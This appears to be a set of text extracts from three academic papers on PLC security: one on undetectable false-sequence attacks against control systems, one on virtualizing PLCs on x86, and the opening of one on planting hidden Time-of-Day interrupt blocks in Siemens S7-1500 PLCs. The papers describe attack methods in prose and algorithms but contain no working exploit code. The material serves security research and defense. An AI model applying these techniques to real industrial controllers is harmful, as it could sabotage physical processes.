We obtain all sets of false sequences generatedfrom NDAAO based on identi cation parameter kis A k=/uniondisplay xi X/parenleftbigmax(| d|)/uniondisplay n=k+2(Sn xi)/parenrightbig , d (9) Since we propose the de nition of false sequence, the next step is to present search algorithm to obtain all the sets ofundetectable false sequences. Algorithm 2 shows that usingrecursion formula of IncSearching can gradually get the false sequences whose length is not less than k+2and those sequences that selected from the NDAAO and disparate from 10093Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. any subsequence of observed I/O vectors start with state xinit. With the output of the IncSearching we acquire all sets of the sequences Akthrough merging all Sxinitwith all start state xinitcoming from states Xof the NDAAO as fol- low, Ak=/uniondisplay xinit X/parenleftbig Sxinit/parenrightbig (10) Algorithm 2 IncSearching Input: the identi ed NDAAO, observed I/O sequence , identi - cation parameter kand initial state xinit Output: the sets of false sequences Sxinit; 1:foreachx xinit do 2:xinit=fnd(x) 3:seq.append(x) 4:IncSearching (NDAAO, ,k,x init) 5: if|seq| (k+2 ) andseq / substring ( )for then 6:Sxinit.append(seq) 7: end if 8:seq.pop() 9:end for 10:ReturnSxinit By Algorithm 2, the obtained sets of un- detectable false sequences of Example 1 are(A,D,B,D,... ),(...,D,C,D,F,... ),(A,B,C,D,F,... ), where the apostrophes before or after the letter can be anypredecessors or successors of the letter. Because attackers might have limited control over limited compromised sensors coming from control system, we re-quire to determine controller I/Os which have changed be-tween two consecutive vectors of false sequences generatedfrom above method. 3.4 Feasibility and Performance Evaluation There are two main reason to support the feasibility of my work. Firstly, with the identi cation parameter kincreas- ing, the states of NDAAO increase rapidly and can be harderto converges to a stable level according to the system evo- lutions in chronological order [10]. Hence, it is dif cult to handle the huge calculation when proceeding on line detec-tion under the condition of the large value k. We mostly implement off-line attack and have enough time to carry outcalculation. Secondly, due to the stability and performanceof detect mechanism, in actual industrial system generally asmall parameter kis enough to meet practical requirements based on fault detection [8]. To evaluate the connectivity of the NDAAO, we will give information about the mean number of edges originatingfrom a state. We de ne the structure complexity metric C s as: Cs=/summationtext xi X(deg(xi)) |X|(11) heredeg(xi)=|fnd(xi)|is the degree of a state. Similar to the complexity metric, we de ne the attack vulnerability index to measure the success rate of the falsesequence searched from the identi ed NDAAO. The attackvulnerability index is shown as: C n A=|/uniontext xi X(An xi)| |Wn Ident|(12)By equation (11) and (12), we can obtain the ratio of the multiple branch state from all states and ratio of the falsesequence from all identi ed I/O sequences. 4 Case Study To demonstrate the feasibility and performance of the pro- posed method for false sequence attack, a case study is pre-sented. The considered system is a small sorting system ofgoods and the function of this system is to sort parcels ac-cording to their size. 
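The two indices in equations (11) and (12) translate almost literally into code; the automaton encoding (states and successor sets) and the counts used in the small demo below are illustrative assumptions, not values from the case study.

```python
def structure_complexity(trans, states):
    """C_s, eq. (11): mean out-degree of the identified NDAAO states."""
    return sum(len(trans.get(x, ())) for x in states) / len(states)

def attack_vulnerability(n_false_sequences, n_identified_words):
    """C_A^n, eq. (12): share of length-n identified words usable as false sequences."""
    return n_false_sequences / n_identified_words

# Toy numbers for illustration only:
states = {"AA", "AB", "CD"}
trans = {"AA": {"AB"}, "AB": {"BC", "BD"}, "CD": {"DE", "DF"}}
print(structure_complexity(trans, states))  # (1 + 2 + 2) / 3 = 1.67
print(attack_vulnerability(12, 250))        # 0.048
```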
The system has 11 inputs (measure-ments from the system) and 5 outputs (signals from PLC tothe actuators). Fig. 7 shows the layout of the sorting systemof goods. Figure 7: Sorting system of goods Figure 8: Part of NDAAO The identi cation database is composed of 50 ob- served cycles of operation and every cycle is col-lected at the right time of the arrival of a parceland its sorting. The vector entries are all formed as[A+,A ,B,C,D,k 1,k2,a0,a1,a2,b0,b1,c0,c1,d0,d1]. After the identi cation process and reduction of the states,the part of NDAAO model with the identi cation parameter k=2 is shown in g. 8. By the obtained model, we implement false sequence searching process and before simpli cation we havesearched plenty of different length of false sequences thatcan be potentially as the malicious logic orders of data in- 10094Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. Figure 9: Amount of false sequences changes with length Figure 10: Relation between CsandCn A jected into compromised sensors. Such as A1=Q34Q21Q22Q30 A2=Q32Q10Q11Q12Q28 A3=Q16Q17Q18Q19Q20Q34 whereQiis the output of each vector of the observed cycles. However, the above sequences require all the compro- mised sensors if adversaries carry out attacks. So we needto simplify the searched sequences using event vector fromthe equation (6) and processed above sequences list as fol-lows, A 1=Q34d11,b01,{b00,d01} Q30 A2=Q32d11,b11,k21,{b10,d01} Q28 A3=Q16{k10,a00,c11d10},a11,a10,k21,{a21,c10} Q34 Here symbol sequences of each arrow divided by comma are sets of single event input between every two vectors of thefalse sequences. When we implemented the process of sort- ing goods with injecting these false sequences, the sortingprocess obtained the wrong sort results without being de- tected by fault detection. From the obtained false sequences, we nd that most of the false sequences are concentrate on the lengths between19 and 26. So the potentially malicious attack can select from false sequences of such lengths. Fig. 9 shows theamount of false sequence changes with length under differ-entk. Considering the feasibility of the attack and the larger state s degree the more multiple branch state, Fig. 10 showsthat with the structure complexity metric C s(ratio of the multiple branch state) decreasing, the attack vulnerability in-dex (ratio of the false sequence) drops quickly. Hence, wecan detect such attack through add the detection on multiplebranch states without deliberately increasing identi cationparameter k. 5 Conclusion In this paper, we have presented false sequence attack as one way to nd the undetectable false sequence attackagainst control system from I/O traces of compromisedPLCs. The obtained false sequence attack will be used asmalicious logic attack injected into remote sensors moni-tored by PLCs to damage the control system. We have given a whole implementation of the construction of false sequence attack including the search algorithm of false se-quence. The detection on multiple branch states will becomean effective defense against such attacks. Simulation showsthat our method is a practical threat against the control sys-tem with fault detection, which illustrate the effectiveness ofour proposed method. References [1] S. McLaughlin, S. Zonouz, D. Pohly, P . McDaniel, A trusted safety veri er for process controller code, In Proc. Network and Distributed System Security Symposium , 2014: 634-645. [2] S. 
McLaughlin, On Dynamic Malware Payloads Aimed at Pro- grammable Logic Controllers. In 6th USENIX Workshop on Hot Topics in Security , 2011:367-374. [3] D. Beresford, Exploiting Siemens Simatic S7 PLCs. In Black Hat USA , 2011,16(2):723-733. [4] Y . Liu, P . Ning, M.K. Reiter, False data injection attacks against state estimation in electric power grids, ACM Trans- actions on Information and System Security (TISSEC) , 2011, 14(1): 13. [5] Q. Yang, J. Yang, W. Y u, On false data-injection attacks against power system state estimation: Modeling and countermea-sures, Parallel and Distributed Systems, IEEE Transactions on , 2014, 25(3): 717-729. [6] S. McLaughlin, S. Zonouz, Controller-aware false data in- jection against programmable logic controllers, Smart Grid Communications (SmartGridComm), 2014 IEEE International Conference on. IEEE , 2014: 848-853. [7] Z. Pang, F. Hou, Y . Zhou, D. Sun, False data injection at- tacks for output tracking control systems, Control Conference (CCC), 2015 34th Chinese , 2015: 6747-6752. [8] M. Roth, S. Schneider, J.J. Lesage, Fault detection and isola- tion in manufacturing systems with an identi ed discrete event model, International Journal of Systems Science , 2012, 43(10): 1826-1841. [9] D. Garcia-Alvarez, M.J. Fuente, G.I. Sainz, Fault detection and isolation in transient states using principal component analysis, Journal of Process Control , 2012, 22(3): 551-563. [10] S. Klein,S. Litz, J.J. Lesage, Fault Detection of Discrete Event Systems Using an Identi cation Approach, in Proceedings of the 16th IF AC World Congress ,2005: 17-22. 10095Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply.
Virtualizing_Programmable_Logic_Controllers_Toward_a_Convergent_Approach.pdf
Modern programmable logic controllers (PLCs) are pervasive components in industrial control systems (ICSs) such as supervisory control and data acquisition, designed to control industrial processes autonomously or as part of a distributed system topology. Their success may be explained by their robustness and reliability, making them one of the most enduring legacies of modern ICS, despite having evolved very little over the last years. This letter proposes an x86-based virtual PLC (vPLC) architecture that decouples the logic and control capabilities from the I/O components, while virtualizing the PLC logic within a real-time hypervisor. To demonstrate the feasibility of this concept, the topic of real-time virtualization for x86 platforms is analyzed, together with an evaluation study of the properties of real-time workloads in partitioned hypervisor environments.
IEEE EMBEDDED SYSTEMS LETTERS, VOL. 8, NO. 4, DECEMBER 2016 69 Virtualizing Programmable Logic Controllers: Toward a Convergent Approach Tiago Cruz, Paulo Sim es, and Edmundo Monteiro Index Terms Converged infrastructures, industrial control systems (ICS), virtualization. I. I NTRODUCTION IN RECENT years, supervisory control and data acquisition (SCADA) industrial control system (ICS) a kind of sys- tems used for controlling industrial processes, power plants,or assembly lines have become a serious concern becauseof manageability and security issues. This comes as a con- sequence of years of air-gaped isolation, together with the increased coupling of ICS and IT systems and the absenceof proper management and security policies, exposing ICSto all sorts of threats. Suddenly, ICS faced a reality that has been familiar for IT infrastructure managers for decades, which led to the development of speci c tools and protocols,as well as the establishment of management frameworks andsecurity-oriented policies. However, bridging the gap between IT and ICS is not a triv- ial matter of transposing technologies from one domain to the other. This is due to the fact that the primary ICS design andoperation concerns are focused on reliability and operationalsafety, advising against any mechanism or solution with poten-tial impact on operational performance indicators. Despite the efforts to develop domain-speci c security and management capabilities for SCADA ICS, most of these solutions try to x what is wrong without introducing signi cant change into Manuscript received May 19, 2016; revised September 4, 2016; accepted September 8, 2016. Date of publication September 12, 2016; date of current version November 22, 2016. This work was supported by the EU ATENAH2020 Project (H2020-DS-2015-1 Project 700581). This manuscript wasrecommended for publication by S. Parameswaran. The authors are with the Department of Informatics Engineering, University of Coimbra, 3030-290 Coimbra, Portugal (e-mail: [email protected] ; [email protected] ;[email protected] ). Color versions of one or more of the gures in this paper are available online at http://ieeexplore .ieee .org. Digital Object Identi er 10.1109/LES.2016.2608418existing architectures, which still struggle to deal with lifecycle operations or change management. In this letter, we propose an innovative approach for ICS infrastructure consolidation, which bridges computing and net- working virtualization technologies with ICS and targets a vital SCADA ICS component: the programmable logic con-troller (PLC). Despite being a mature concept that incarnatesa design philosophy well established across the industry, PLCsare one of the most vulnerable components on ICS, due to design (e.g., most PLCs lack redundant units such as power supplies) or cyber-security issues (as demonstrated byStuxnet [ 1]). By leveraging virtualization and advanced com- munication technologies to decouple the PLC physical I/O andcomputing capabilities, we may turn it into a real-time virtual machine (VM) hosted on a real-time hypervisor, connected to I/O modules on the eld using a switched deterministic and/orreal-time Ethernet fabric system, with bene ts in terms ofresource consolidation, security, resiliency, and manageability. II. 
T OWARD VIRTUALIZED PLC Modern PLCs are a class of embedded systems which incorporate technologies such as microprocessors and micro-controllers, real-time operating systems (RTOS) (hosting theexecution environment for the main functions and services), and communication capabilities (from serial point-to-point or bus topologies to Ethernet and TCP/IP). PLC hardwaregenerally includes analog or digital I/O modules, eldbusinterconnects, or serial communication interfaces, being occa-sionally coupled with eld-programmable gate arrays (FPGA) or digital signal processors (DSP) for real-time signal process- ing. Since a considerable share of these devices use commodityinstruction set architecture CPUs (such as x86 or advancedRISC machines), the possibility of virtualizing them comes tomind, which is one of the main requirements of the virtual PLC (vPLC) architecture, discussed in this section. A. PLCs and Real-Time Virtualization on x86 Platforms The recent trend toward IT service and infrastructure consol- idation owes much of its success to virtualization technologies.This has provided the means to effectively leverage comput-ing and communication resources, introducing a great deal of exibility, while also streamlining and simplifying day-to-day operations. For instance: by creating a VM snapshot before applying a security patch, changes can be rolled back in caseof failure; VMs can be cloned for sandboxed testing, prior todeployment into production; also, VM instances can be livemigrated, allowing for reduced downtime every time a physical device needs to be stopped. Unlike what happened in the IT domain, the introduc- tion of virtualization technologies for ICS has been a slow 1943-0663 c/circlecopyrt2016 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. Seehttp://www.ieee.org/publications_standards/publications/rights/index.html for more information. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:10 UTC from IEEE Xplore. Restrictions apply. 70 IEEE EMBEDDED SYSTEMS LETTERS, VOL. 8, NO. 4, DECEMBER 2016 process (as with any other new technology), and not as straightforward. Only recently operators started virtualiz- ing SCADA master stations, human machine interfaces, andhistorian database servers, using commercial off-the-shelf(COTS) hypervisors [ 2]. This was enabled by the emergence of hardware-assisted memory management and I/O mecha- nisms [ 3], providing adequate performance guarantees while avoiding resource overprovisioning. But PLC virtualization is a different matter, as the require- ments for its RTOS environment and communications pri-oritize low and consistent latency. Most COTS hypervisors for x86 are designed for general-purpose workloads where throughput is priority, resorting to techniques such as hardwareresource sharing or deferred interrupt processing, which havea penalty in terms of latency and determinism. For this reason,RT-sensitive applications such as servo control for computer- ized numerical control machinery cannot be reliably hosted within such hypervisors, as it only takes a single latency peakto create a signi cant positioning skew. Achieving RT compliance may prove dif cult, even for native execution. For instance, the end-to-end response latency for components on interconnected buses can be affected byaspects such as interrupt latency, message propagation delays,asynchronous periodic task overhead or RTOS task schedul-ing overhead. 
Particularly, interrupt latency and CPU overhead involved in servicing interrupts are paramount in embedded systems used for control applications. For example, [ 4] and [ 5] estimate interrupt and context switch latency requirements of280 and 800 s for machine and process control industrial applications, respectively. For extreme cases, such as motion control applications, PLCs have to provide very low operation latencies, from 1ms to 250 s (Class 3 RT Systems [ 6]). Originally, interrupt processing in the x86 PC architec- ture was based on programmable interrupt controllers (PIC).Cascaded 8259 PIC provided up to 15 xed-priority interrupts channels using pointers to locate the vector entry points for the interrupt service routines associated with each channel.Later, the IO-advanced PIC (APIC) was introduced, support-ing up to 24 interrupt channels, multiprocessor systems andprogrammable priorities while an improvement in compari- son with the dual PIC arrangement, APIC interrupt processing and routing was a latency-prone, multistep procedure [ 4]. Things considerably improved with the advent of PCI express (PCIe) and the message signaled interrupts (MSI)model, which supports 224 interrupts, eliminates the need to use the IO-APIC, and allows every device to write directly to the CPU s local-APIC, avoiding out-of-band interrupt sig-nalling overhead, by using memory write operations. MSIsreduce the latency and CPU overhead involved in servicinginterrupts, improving system performance and IO responsive- ness. Latency can improve as much as 300% when compared to IO-APIC and 500% when compared with 8259-PIC [ 4]. Table Iillustrates the results for IO-APIC and MSI modes. Modern x86 CPUs provide code density and memory band- width, supporting single instruction multiple data (SIMD) instruction set architecture extensions such as streaming SIMD instructions or advanced vector extensions (akinto an integrated DSP, with compilers performing auto-vectorization, eliminating communication, and transport overhead). However, not all x86 developments bene t real-time applications: power optimization and throughput-enhancing technologies, such as frequency-scaling or hardwareTABLE I INTERRUPT LATENCY COMPARISON (FROM [4]) Fig. 1. vPLC deployment (adapted from [ 7]). threads (hyperthreading), harm deterministic behavior though most of them can be disabled or ne-tuned. Still, some notable (if somewhat odd) exceptions persist, such as system management interrupts (SMI). SMIs were originally introduced to support power manage- ment capabilities, and later used for other functions such as USB legacy peripheral device emulation. An SMI event asyn- chronously suspends all normal program execution in orderto switch to a special system management mode, where spe-ci c rmware code is executed for this reason, SMIs are acommon cause of latency spikes. Explicit SMI control is not possible in all x86 platforms, as it depends on speci c chipset, rmware and original equipment manufacturer options. Overall, the x86 platform has become an interesting can- didate to host PLC applications, despite some manageableshortcomings (e.g., several providers of RT turnkey solu- tions provide certi ed hardware lists, while some tier-1 OEMs resort to custom rmware or provide mechanisms to disablenoncritical SMIs for RT usage). B. 
Virtual PLC Recent developments, such as low-latency deterministic net- work connectivity for converged Ethernet (able to supportrobust distributed I/O) and the availability of real-time hyper-visors, made it possible to virtualize PLC components [ 7]. The proposed vPLC architecture (Fig. 1) takes advantage of these capabilities, by decoupling the PLC execution environ-ment from I/O modules using a software-de ned networking(SDN)-enabled Ethernet networking fabric to provide connec-tivity to the I/O subsystem. This departs from the existing SoftPLC concept (which mostly runs on COTS x86 systems, eventually using RTOS systems, such as [ 8] and [ 9]), by adopt- ing an approach close to [ 10] and [ 11] but going one step further, by leveraging converged fabric scenarios with SDN. In the vPLC the dedicated PLC I/O bus is replaced by a deterministic and high-speed networking infrastructure, using SDN to enable the exible creation of virtual channels onthe I/O fabric. These channels provide connectivity between Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:10 UTC from IEEE Xplore. Restrictions apply. CRUZ et al. : VIRTUALIZING PLCs: TOWARD A CONVERGENT APPROACH 71 the vPLC instances and physical I/O modules, which can be implemented using FPGA or application speci c integrated circuit technology. Finally, virtual channel recon gurationis managed by means of an SDN controller, via a high-availability server (not depicted in the gure) which monitorsSDN switch statistics and path reachability, recon guring channel paths in case of performance degradation or failure. This model is similar to remote or distributed I/O PLC topologies, where networked I/O modules act as extensions ofthe PLC rack, or even critical avionics systems, which replacelegacy interconnects with Ethernet-based technologies such as avionics full-duplex switched Ethernet [ 12]. In fact, initiatives such as converged plantwide Ethernet [ 13] already point in this direction. Developments in cut-through switching, togetherwith remote direct memory access, allow for port-to-portlatencies in the order of hundredths of nanoseconds in 10G Ethernet switch fabrics and application latencies in the order of microseconds [ 14]. Also, resources such as Intel s data plane development kit [ 15] enable low latency, high-throughput packet processing mechanisms that bypass kernels, bringing the network stack into userspace and enabling adapters to per- form DMA operations. This enables single-digit microsecondjitter and restricted determinism, allowing for bare-metal per-formance on commodity server hardware. Additionally, timedivision-based approaches using IEEE 1588 clock synchro- nization, such as time sensitive networking [ 16] allow for real-time requirements in the microsecond range on COTSEthernet, compatible with strict isochronous operation needs. Finally, real-time static partitioning hypervisors, such as Jailhouse [ 17]o rP i k e O S[ 18], make it possible to host RTOS guest VMs for real-time and certi able workloads, with PikeOS closely replicating the ARINC 653 [ 12] partitioning model for safety-critical avionics RTOS. Moreover, [ 19] points to the possibility of providing RT capabilities in the KVM [ 20] hypervisor, when combined with the Linux RT-Preempt [ 21] patch and speci c tuning. 
In such environments, resources such as PLC watchdogs and system-level debugging and trac-ing analysis mechanisms (useful for continuous security and/orsafety assessment) can be implemented at the hypervisor level,which is able to oversee partition behavior. III. E VA L UAT I O N Evaluation is focused on understanding to which point partitioning techniques may prove effective for implement- ing real-time hypervisor environments, when used on modernhardware. The test platform uses an Intel Core i7-4770 runningat 3.40 GHz (Haswell family) paired with 16 GB DDR3 RAM, using Debian Linux 8.4 with kernel version 3.18.29. Three ver- sions of the kernel were used: 1) baseline, with the standarddistribution settings; 2) host-optimized, with KVM hypervisorsupport; and 3) guest-optimized. The latter two were compiledwith the RT-pre-empt patch, for realtime support. Latency measurements were performed using cyclictest [22] to measure the response latency for four timer threads clockedat 10 ms, spaced 500 s from each other and run with a high scheduler priority (PRIO_FIFO), to emulate an RT task.Stress [23] was used for workload generation, instantiating 20 simultaneous threads (10 for CPU bound tasks and 10 for spinning malloc/free operations on 64 MB blocks), enough toexhaust a single core. Tests were based on 120 min runs. The rst round of tests (Fig. 2) focused on compar- ing a baseline system con guration using a standard kernel,Fig. 2. Bare metal test results. with hyperthreading and power management support enabled, comparing it with an RT-optimized con guration. For the lat- ter purpose, all power management features were disabled(c-states, dynamic core frequency, and PCIe power man-agement), as well as hyperthreading support, which have anegative impact on latency and jitter. Also, the Linux ker- nel was con gured with core isolation, removing cores 1 to 3 from process scheduling and balancing algorithms, interruptprocessing (whose af nity was manually adjusted to core 0)and other tasks, such as read-copy update threads. The testworkload contemplates three scenarios: 1) idle state; 2) load on shared core (load generator and latency test scheduled on core 1); and 3) split core tests (latency and stress generatorrunning on cores 1 and 2, respectively emulating a scenariowhere best effort and RT tasks could be run on separate cores). Results show the default con guration to be unreliable for RT purposes. While the 2 (split) core test shows improvement, there are large latency spikes, probably due to dynamic powermanagement and scaling, together with dynamic OS corescheduling and low core usage. Results for the RT-optimizedcon guration show large improvements, with the system behaving within very low latency margins, with low jitter and spikes in fact, these margins are within the acceptable rangefor several motion control applications. These values could befurther improved using specialized RTOS or kernel extensionssuch as Xenomai or RTAI [ 24]. The second round of tests (Fig. 3) evaluated RT perfor- mance for a single VM, using resource partitioning and twouse cases: 1) a VM with a single processor core assignedand 2) the same VM with three processor cores using coreaf nity and memory locking on both cases. The three-core VM used the same test pattern of the bare-metal RT-optimized tests. Results show that, despite the contention effects (every-thing is running on the same core), the single core VM showsa controlled behavior which is acceptable for a wide range of PLC-class applications. 
Nested partitioning tests [3 core VM, 2 core (split)] demonstrated the possibility of running RTapplications with even stricter timings within VMs. Moreover,there is a considerable margin for improvement in terms ofhypervisor mechanisms and VM payload (e.g., we achieved a2 s average latency with small jitter using a Xenomai co-kernel, in the same setup). The third round of tests (Fig. 4) evaluated concurrent real- time VM performance, using resource partitioning for 3 VMswith a 1:1 core assignment ratio. Results show a uniform and consistent behavior pattern across the 3 VMs, demonstrating the performance isolation of the partitioning approach. Overall, the tests show that optimized resource partition- ing provides performance guarantees for isolated workloads,while ensuring adequate graceful degradation under heavy Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:10 UTC from IEEE Xplore. Restrictions apply. 72 IEEE EMBEDDED SYSTEMS LETTERS, VOL. 8, NO. 4, DECEMBER 2016 Fig. 3. Test results for 1 VM. Fig. 4. Test results for 3 VMs. load (a situation that nonetheless must be avoided for RT workload cores). Results can be further improved by soft-ware optimization and enhancements such as device af nity(using IO-MMU [ 3] mechanisms) or even cache partitioning (e.g., Intel s cache allocation technology), which extend the partitioning concept down to the CPU L3 cache, achieving better latency and further containing and isolating partitionedworkloads. IV . C ONCLUSION The proposed vPLC constitutes a convergent approach in the sense that isolated PLC devices are virtualized and co-hostedon the same physical equipment, with distributed I/O being consolidated on the networked I/O fabric. This constitutes a convergence of computing and communication resourcestoward a uni ed infrastructure, much in the same way as ithappened with datacenter architectures in the IT domain. Evaluation results show that the vPLC is feasible from a systems virtualization perspective, with a considerable margin for further improvement on 86 platforms. Nonetheless, this letter is focused on the presentation of the vPLC conceptand evaluation of the suitability of 86 virtualization for concurrent PLC workloads. Next developments include the implementation and validation of the SDN-based I/O orches-tration and RT communications capabilities (using Xenomai sreal-time driver model framework) that provide the couplingof the vPLC instances with the physical infrastructure in order to comply with determinism and latency requirements. Finally, it should be stressed that, despite its name, the vPLC is more than the simple virtualization of the PLC device, con-stituting an integrated approach where the device seamlessly merges with the infrastructure, providing potential bene ts in terms of manageability, cost, and security.R EFERENCES [1] R. Langner, To kill a centrifugue: A technical analysis of what Stuxnet s creators tried to achieve, Langner Group, Berlin, Germany:Tech. Rep., 2013. [Online]. Available: http://www.langner.com/ en/wp-content/uploads/2013/11/To-kill-a-centrifuge.pdf [2] J. Reeser, T. Jankowski, and G. M. Kemper, Maintaining HMI and SCADA systems through computer virtualization, IEEE Trans. Ind. Appl. , vol. 51, no. 3, pp. 2558 2564, May/Jun. 2015. [3] M. Garc a-Valls, T. Cucinotta, and C. Lu, Challenges in real-time vir- tualization and predictable cloud computing, J. Syst. Architect. , vol. 60, no. 9, pp. 726 740, 2014. [4] L. 
Kean, Microcontroller to Intel architecture conversion: PLC using Intel atom processor, Intel Corp., Santa Clara, CA, USA, White Paper,2010. [5] S. Balacco and C. Lanfear, The embedded software strategic mar- ket intelligence program 2002/2003 vol. I: Embedded systems marketstatistics, Venture Develop. Corp., Mill Valley, CA, USA, Tech. Rep.,2003. [6] C. E. Pereira and P. Neumann, Industrial Communication Protocols , S. Y . Nof, Ed. Heidelberg, Germany: Springer-Verlag, 2009. [7] T. J. Cruz, R. Queiroz, P. Simoes, and E. Monteiro, Security implica- tions of SCADA ICS virtualization: Survey and future trends, in Proc. 15th Eur. Conf. Cyber Warfare Security (ECCWS) , Munich, Germany, 2016, pp. 74 83. [8] Codesys GmbH. Codesys Control The Controller Functionality Software . Accessed on Apr. 29, 2016. [Online]. Available: https://www .codesys .com [9] ISaGRAF. Isagraf Overview . Accessed on Apr. 29, 2016. [Online]. Available: http://www .isagraf .com [10] Intel Corporation, Reducing cost and complexity with industrial system consolidation, White Paper, 2013. [11] IntervalZero, A soft-control architecture: Breakthrough in hard real- time design for complex systems, White Paper, 2010. [12] C. M. Fuchs, The evolution of avionics networks from ARINC 429 to AFDX, in Proc. Innov. Internet Technol. Mobile Commun. Aerosp. Netw. , vol. 65. 2012, pp. 65 76. [13] P. Didier et al. , Converged plantwide Ethernet (CPwE) design and implementation guide, Cisco Press, Indianapolis, IN, USA, Tech. Rep. ENET-TD001E-EN-P, 2011. [Online]. Available: http://literature.rockwellautomation.com/idc/groups/literature/documents/td/enet-td001_-en-p.pdf [14] M. Beck and M. Kagan, Performance evaluation of the RDMA over Ethernet standard in enterprise data center infrastructure, in Proc. 3rd Workshop Data Center Convergent Virtual Ethernet Switch. , San Francisco, CA, USA, 2011, pp. 9 15. [15] W. Zhang, T. Wood, K. K. Ramakrishnan, and J. Hwang, SmartSwitch: Blurring the line between network infrastructure & cloud applications, inProc. 6th USENIX Workshop Hot Topics Cloud Comput. , Philadelphia, PA, USA, 2014. [16] IEEE. Time-Sensitive Networking Task Group . Accessed on May 18, 2016. [Online]. Available:http://www .ieee802 .org/1/pages/tsn .html [17] Siemens AG. Jailhouse Partitioning Hypervisor . Accessed on May 18, 2016. [Online]. Available: https://github .com/siemens/jailhouse [18] C. Baumann, T. Bormer, H. Blasum, and S. Tverdyshev, Proving mem- ory separation in a microkernel by code level veri cation, in Proc. 14th IEEE Int. Symp. Object/Comp./Service Orient. Real Time Distrib. Comput. , 2011, pp. 25 32. [19] R. Riel, Real-time KVM from the ground up, in Proc. KVM Forum , 2015. [Online]. Available: http://www.linux-kvm.org/ images/2/24/01x02-Rik_van_Riel-KVM_realtime.pdf [20] KVM Project . Accessed on May 18, 2016. [Online]. Available: http://www .linux-kvm .org [21] H. Fayyad-Kazan, L. Perneel, and M. Timmerman, Linux PREEMPT-RT v2.6.33 versus v3.6.6: Better or worse for real-time applications? ACM SIGBED Rev. , vol. 11, no. 1, pp. 26 31, Feb. 2014. [22] RT Linux WiKi . Accessed on May 18, 2016. [Online]. Available: http://rt .wiki .kernel .org [23] Stress Project . Accessed on May 18, 2016. [Online]. Available: http:// people.seas.harvard.edu/ apw/stress [24] A. Barbalace et al. , Performance comparison of VxWorks, Linux, RTAI and Xenomai in a hard real-time application, in Proc. 15th IEEE-NPSS Real Time Conf. , Batavia, IL, USA, Apr. 2007, pp. 1 5. 
No_Need_to_be_Online_to_Attack_-_Exploiting_S7-1500_PLCs_by_Time-Of-Day_Block.pdf
In this paper, we take the attack approach introduced in our previous work [8] one step further in the direction of exploiting PLCs offline, and extend our experiments to cover the latest and most secured Siemens PLC line, i.e. the S7-1500 CPUs. The attack scenario conducted in this work aims at confusing the behavior of the target system while the malicious attacker is connected neither to the victim system nor to its control network at the very moment of the attack. The new approach presented in this paper comprises two stages. First, an attacker patches the PLC with a specific interrupt block, Time-of-Day, once he manages to successfully access/compromise an exposed PLC. Then he triggers the block at a later time of his choosing, when he is completely offline, i.e. disconnected from the control network. For a real-world implementation, we tested our approach on a Fischertechnik system using an S7-1500 CPU that supports the newest version of the S7CommPlus protocol, i.e. S7CommPlus v3. Our experimental results showed that we could infect the target PLC successfully and conceal our malicious interrupt block in the PLC memory until the very moment we had already determined. This makes our attack stealthy, as the engineering station cannot detect that the PLC got infected. Finally, we present security and mitigation methods to prevent such a threat.
978-1-6654-6692-9/22/$31.00 2022 IEEENo Need to be Online to Attack - Exploiting S7-1500 PLCs by Time-Of-Day Block Wael Alsabbagh1,2and Peter Langend rfer1,2 1IHP Leibniz-Institut f r innovative Mikroelektronik, Frankfurt (Oder), Germany 2Brandenburg University of Technology Cottbus-Senftenberg, Cottbus, Germany E-mail: (Alsabbagh, Langendoerfer)@ihp-microelectronics.com Index Terms PLCs, ICSs, Cyber Attacks, Cyber-Physical systems security; I.INTRODUCTION Attackers target the control logic program to compromise exposed Programmable Logic Controllers (PLCs) aiming at sabotaging the control processes driven by the victim industrial devices. Such a threat is known, in the industrial community, as a control logic injection, or a control logic modi cation. It involves manipulating the original user-program that the PLC is programmed with, typically by employing a man in the middle (MITM) approach as reported in [2], [3], [7] [9], [11], [19] [21], [31], [32], [36]. The main vulnerability that attackers exploit in this attack is the lack of integrity algorithms used by PLC protocols. As a response to this threat, most of the ICS vendors recommended engineers and ICS operators to set passwords to avoid unauthorized accesses form malicious adversaries. In other words, when a user tries to gain access to the program running in a PLC, it rst checks if he is authenticated by initiating a so-called authentication protocol. If the authentication process succeeds, it allows him to read/write the program using a proprietary communication protocol. However, this solution could not suf ciently secure PLCs from unauthorized access as previous academic efforts[1] [3], [7], [22], [36] presented successful bypass attacks on the authentication methods used in PLCs from different vendors. Consequently, protecting the control logic programs with only setting passwords failed to prevent attackers from accessing PLCs and manipulating their programs. The existing control logic injection attacks in the research community have two huge challenges: First, a classic injection attack is normally designed to have access to PLCs in certain circumstances [2] [9], [15], [20], [21], [31], [36] e.g., the security means applied are absent or disabled for a speci c reason such as there are ongoing impenitence processes, other hardware components are added/removed to/from the control network, security means are being updated, etc. Despite PLCs during those critical times have a high chance to get unautho- rized infections, but they are not running in their normal states i.e. the physical processes are, more likely, to be temporally off. Thus, if an adversary gains access to the victim PLC dur- ing those times, and conducts his attack right after that, he will, pretty likely, not success in impacting the physical process. Secondly, once the ICS operator is done with any maintenance process, he normally re-activates the security means before operating the system once again. This procedure allows him to detect any infection in the PLC. Our approach introduced in this paper overcomes the above-mentioned challenges by inserting certain malicious instructions in an interrupt block, and then patching the target PLC with the block once the attacker manages to access the control network successfully. The infection remains invisible in the PLC s memory, and will be only activated at a later time that the adversary sets. 
This ensures that the patch is neither triggered while the system is not running normally, nor revealed by the implemented security means.
The prime focus of this paper is on S7 SIMATIC PLCs provided by Siemens. This is due to the fact that Siemens leads the industrial automation market [33]-[35], and its SIMATIC families hold approximately 30-40% of the entire industry market. Our experiments involve the newest PLC line, i.e. the S7-1500, and its respective engineering software, i.e. the Totally Integrated Automation (TIA) Portal. The motivation behind this work is that Siemens reportedly claimed that its S7-1500 PLCs are well secured against various attacks, and that the S7CommPlus protocol used in such devices has improved anti-replay and integrity check mechanisms. For implementing a real-world attack, a Fischertechnik training factory controlled by an S7-1512SP CPU was used.

A. Assumptions
